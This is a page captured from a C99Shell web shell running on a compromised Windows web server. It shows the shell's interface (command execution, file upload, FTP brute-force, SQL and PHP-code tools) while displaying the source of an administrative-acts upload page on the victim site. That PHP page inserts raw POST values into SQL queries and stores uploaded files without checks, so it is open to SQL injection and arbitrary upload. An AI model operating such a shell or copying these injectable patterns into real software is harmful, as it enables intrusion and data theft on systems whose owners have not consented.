!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA\boletinlegal\admin\actos\   drwxrwxrwx
Free 1.2 GB of 239.26 GB (0.5%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ingresar.php (9.96 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php include("../usuarios/include/session.php");

/**
 * UserEdit.php
 *
 * This page is for users to edit their account information
 * such as their password, email address, etc. Their
 * usernames can not be edited. When changing their
 * password, they must first confirm their current password.
 *
 * Written by: Jpmaster77 a.k.a. The Grandmaster of C++ (GMC)
 * Last Updated: August 26, 2004
 */

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <title>Modulo Administración</title>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
        <link rel="shortcut icon" href="../../images/favicon.ico">
        <link rel="stylesheet" type="text/css" href="../css/default.css"/>
        <title>Actos Administrativos</title> 
        <script type="text/javascript" src="../js/jquery-1.3.1.min.js"></script>
<script type="text/javascript" src="../js/jquery.functions.js"></script>

 <script type="text/javascript" src="../js/nicEdit-latest.js"></script> 
 <script>

function validar(formulario){
if(document.forms.f1.no.value =="")
{
window.alert('Debe ingresar el numero del acto administrativo');
f1.no.focus();
return(false);
}
if(document.forms.f1.fecha.value =="")
{
window.alert('Debe ingresar la fecha');
f1.fecha.focus();
return(false);
}
if(document.forms.f1.imagen.value =="")
{
window.alert('Debe adjuntar un archivo');
f1.imagen.focus();
return(false);
}

if(document.forms.f1.usuario.value =="")
{
window.alert('Debe ingresar el usuario');
f1.usuario.focus();
return(false);
}
if(document.forms.f1.sector.value =="")
{
window.alert('Debe ingresar el sector');
f1.sector.focus();
return(false);
}
if(document.forms.f1.direccion.value =="")
{
window.alert('Debe ingresar la dependencia que lo proyecto');
f1.direccion.focus();
return(false);
}
}
</script> 
 <script>
function rellenar(quien,que){
cadcero='';

for(i=0;i<(5-que.length);i++){
cadcero+='0';

quien.value=cadcero+que;
}

if (quien.value == '00000'){
quien.value='';
}
}
</script>
<script type="text/javascript">
    //<![CDATA[
    bkLib.onDomLoaded(function() { nicEditors.allTextAreas() });
    //]]>
    </script>
</head>
    <body>    
    <?php 
/**
 * User has submitted form without errors and user's
 * account has been edited successfully.
 */
if(isset($_SESSION['useredit'])){
   unset(
$_SESSION['useredit']);
   
   echo 
"<h1>Cuenta editada satisfactoriamente!</h1>";
   echo 
"<p><b>$session->username</b>, tu cuenta ha sido actualizada satisfactoriamente. "
       
."<a href=\"index.php\">Inicio</a>.</p>";
}
else{
?>
<?php
/**
 * If user is not logged in, then do not display anything.
 * If user is logged in, then display the form to edit
 * account information, with the current email address
 * already in the field.
 */
if($session->logged_in){
?>

<?php include("../../conex.php");
$ano substr($_POST['fecha'],0,4);
$created_date date("Y-m-d H:i:s");

//echo $file;
  
if( $_POST['inserta'] ){
    if (
$_POST['tipo'] == 'AUTO')
    {
        
$tabla 'AUTOS';
    }
    else{
        
$tabla 'RESOLUCIONES';
    }
    
    
$sql "select * from $tabla where id = '$_POST[id]'";
    
$cursor mysql_query$sql$conexion );
    if( 
mysql_fetch_array$cursor ) )
     echo 
" <script language='JavaScript' type='text/javascript'>
alert('Error en el acto administrativo 
$_POST[id]') </script>";
     
     
     else{
    
$sql "insert into $tabla values ('$_POST[no]','$_POST[fecha]','$_POST[resuelve]','$_POST[expediente]','$_POST[usuario]','$_POST[sector]','$_POST[subsector]','$_POST[abogado]','$_POST[direccion]','','$_POST[tipo]','$_POST[fijacion]','$_POST[desfijacion]','$session->username','$created_date')"

$path $_FILES['imagen']['name'];
$extacto pathinfo($pathPATHINFO_EXTENSION);
//echo $extacto;
$path $_FILES['notificacion']['name'];
$extnot pathinfo($pathPATHINFO_EXTENSION);
//echo $extnot; 
$file "../../../resoluciones/$tabla $ano/".$_POST["no"].".$extacto";
$file1 "../../../resoluciones/$tabla $ano/".$_POST["no"]."-.$extnot";
if (
file_exists($file) || file_exists($file1) ){
    
//echo "El archivo existe";
   
echo " <script language='JavaScript' type='text/javascript'>
        alert('Error -  '); 
        window.location.href='ingresar.php' </script>
        "
;
        exit();
}else{
   
//echo "El archivo no existe";
   //echo $file;
move_uploaded_file($_FILES['imagen']['tmp_name'],$file.$FILES['imagen']['name']); 
move_uploaded_file($_FILES['notificacion']['tmp_name'],$file1.$FILES['notificacion']['name']); 
//echo $sql;    
      
if( mysql_query $sql$conexion ) ){
        echo 
" <script language='JavaScript' type='text/javascript'>
alert('Registro ingresado') </script>"
;
    
    }

}

    }
  
  } 
?>
        <form id="f1" name="f1" onsubmit="return validar(this)" action="" method="post"  class="register" enctype="multipart/form-data">
            <h1>Ingresar</h1>
            <fieldset class="row1">
                <legend>Información General </legend>
              <p>
                <label>No *
                </label>
                  <input type="text" id="no" onBlur="rellenar(this,this.value)" size="16" maxlength="5" name="no"/>
                    <label>Fecha *
              </label>
                  <input type="date" id="fecha" name="fecha"/>
                </p>
              <p>
                    <label>Tipo*
        </label>
                    <SELECT
                              name=tipo class="fundamentals" 
                              id=tipo tabIndex=4 value="" maxLength=200>
                      <option value="AUTO">Auto</option>
                      <option value="RESOLUCION">Resolución</option>
                </SELECT>
                <label>&nbsp;&nbsp;&nbsp;Dependencia&nbsp;&nbsp;*
                </label>
                    <input type="text" id="direccion" name="direccion"/>
                </p>
            </fieldset>
            <fieldset class="row2">
                <legend>Información Detallada
                </legend>
              <p>
                <label>Titulo *
                  </label>
                  <textarea name="resuelve" cols="50" class="long" id="resuelve"></textarea>
                </p>
                <p>
                    <label>Usuario *&nbsp;&nbsp;
                    </label>
                    <input type="text" id="usuario" maxlength="150" name="usuario"/>
                </p>
                <p>
                    <label class="optional">Subsector&nbsp;
                    </label>
                    <input name="subsector" type="text" class="long" id="subsector" maxlength="10"/>
                </p>
                <p>
                    <label class="optional">Expediente
                    </label>
                    <input name="expediente" type="text" class="long" maxlength="50"/>
                </p>
          <p>
                    <label class="optional">Abogado&nbsp;&nbsp;&nbsp;
    </label>
                    <input name="abogado" type="text" class="long" maxlength="200"/>
              </p>
                <p>
                    <label>Sector *&nbsp;&nbsp;&nbsp;
                  </label>
                  <select name="sector" size="1"  id="sector" tabindex="5">
                    <option value="" selected="selected"></option>
                      <option value="Competencia-Estructura">Competencia-Estructura</option>
                      <option value="SILVICULTURA">Silvicultura</option>
                      <option value="VERTIMIENTOS">Vertimientos</option>
                      <option value="Aguas Superficiales y Monitoreos">Aguas Superficiales y Monitoreos</option>
                      <option value="Hidrocarburos">Hidrocarburos</option>
                      <option value="Suelos">Suelos</option>
                      <option value="Aguas Subterraneas">Aguas Subterráneas</option>                      
                      <option value="PEV">Publicidad Exterior Visual</option>
                      <option value="AIRE">Aire</option>
                      <option value="RUIDO">Ruido</option>
                      <option value="RESIDUOS">Residuos</option>
                      <option value="MINERIA">Minería</option>
                      <option value="FLORA">Flora</option>
                      <option value="FAUNA">Fauna</option>
              <option value="INFRAESTRUCTURA">Infraestructura</option>
                </select>
                </p>
        
    
        </fieldset><p>&nbsp;</p><p>&nbsp;</p>
          <fieldset class="row3">
              <legend>Cargue de Archivos
                </legend>
              <p>
                <label> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Acto *</label>
                  <input name="imagen" type="file" tabindex="11" />
                    
              </p>
                <p>
                    <label>Notificación *</label>
                    <input type="file" name="notificacion"/>
                    
                </p>            

                
              
            </fieldset>
<!--

<div class="infobox">
            <h4> InformaCión IMPORTANTE</h4>
                    <p>Para el cargue de archivos tenga en cuenta que una vez guardados los documentos relacionados al acto administrativo y la notificación, estos no se podrán modificar.</p>
                    <p>&nbsp;</p>
              </div>
-->
          <div>
          <input name="inserta" class="button" type="submit" id="inserta" value="Guardar &raquo;"   style="color:#FFF">
          <input name="limpia" class="button" type="reset" id="limpia" value="Limpiar   &raquo;"   style="color:#FFF">
          <button name="vuelve" class="button"  id="vuelve" ><a href="../admin.php" style="color:#FFF">Volver &nbsp;&nbsp;&nbsp;&raquo;</a></button></div>
        </form>
        <?php
}
}

?>
    </body>
</html>






:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0624 ]--